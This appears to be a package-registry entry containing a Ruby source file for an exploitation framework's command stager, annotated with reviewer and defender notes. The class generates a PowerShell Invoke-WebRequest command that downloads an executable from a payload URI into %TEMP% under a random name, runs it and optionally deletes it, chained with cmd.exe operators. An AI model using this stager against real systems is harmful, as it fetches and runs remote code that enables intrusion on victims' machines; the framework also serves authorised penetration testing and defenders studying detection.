Sha256: 9711bb30ec56aa5be5576443d010e15de2dfd5efba05604de1244ab364f1e1cb
Contents?: true
Size: 948 Bytes
Versions: 18
Compression:
Stored size: 948 Bytes
Contents
# -*- coding: binary -*-

# Command stager that emits a PowerShell `Invoke-WebRequest` one-liner to
# fetch a file over HTTP, followed by commands that run the file and
# (optionally) delete it.
#
# Reviewer/defender notes, all derived from the code below:
# * The generated command line is plain text. It contains the literal
#   strings `powershell.exe -c Invoke-WebRequest -OutFile`, the output path
#   and the URI, so process-creation logging that records command lines
#   captures it in full.
# * The output path defaults to `%TEMP%\<name>.exe`, where `<name>` comes
#   from `Rex::Text.rand_text_alpha(8)`.
# * The path and URI are interpolated verbatim; this class applies no
#   quoting or escaping.
# * The individual commands are meant to be joined with ` & `
#   (see #cmd_concat_operator), i.e. cmd.exe-style chaining.
class Rex::Exploitation::CmdStagerPSHInvokeWebRequest < Rex::Exploitation::CmdStagerBase
  # @return [true] always; presumably tells the framework that this stager
  #   fetches over HTTP (inferred from the method name -- confirm against
  #   CmdStagerBase)
  def http?
    true
  end

  # Pattern for the client's User-Agent string. How the framework applies
  # it is not visible here; presumably it is matched against the incoming
  # HTTP request's User-Agent header.
  #
  # @return [Regexp]
  def user_agent
    /WindowsPowerShell/
  end

  # Fills in default options, records the on-target file path in
  # +@payload_path+, and then defers to the parent implementation.
  #
  # Note that +opts+ is modified in place: +:temp+ and +:file+ are set when
  # the caller did not supply them.
  #
  # @param opts [Hash] stager options
  # @option opts [String] :payload_uri URI to fetch from (required)
  # @option opts [String] :temp directory for the file (default '%TEMP%')
  # @option opts [String] :file file name (default: random name + '.exe')
  # @raise [RuntimeError] when +opts[:payload_uri]+ is nil
  # @return whatever the superclass +generate+ returns
  def generate(opts = {})
    raise "#{self.class.name}##{__callee__} missing opts[:payload_uri]" if opts[:payload_uri].nil?

    dir = (opts[:temp] ||= '%TEMP%')
    name = (opts[:file] ||= "#{Rex::Text.rand_text_alpha(8)}.exe")
    @payload_path = "#{dir}\\#{name}"

    # Bare `super` forwards the (now populated) opts hash unchanged.
    super
  end

  # Builds the download command.
  #
  # @param opts [Hash] stager options; only +:payload_uri+ is read here
  # @return [Array<String>] a single-element array holding the command
  def generate_cmds_payload(opts)
    # NOTE: This requires PowerShell >= 3.0
    download = "Invoke-WebRequest -OutFile #{@payload_path} #{opts[:payload_uri]}"
    # TODO: Craft a better command line, probably with encoding
    ["powershell.exe -c #{download}"]
  end

  # Builds the follow-up commands: the file path itself (as a command),
  # then a `del` of that path unless +opts[:nodelete]+ is truthy.
  #
  # @param opts [Hash] stager options; only +:nodelete+ is read here
  # @return [Array<String>]
  def generate_cmds_decoder(opts)
    return [@payload_path] if opts[:nodelete]

    [@payload_path, "del #{@payload_path}"]
  end

  # @return [String] separator placed between the generated commands
  def cmd_concat_operator
    ' & '
  end
end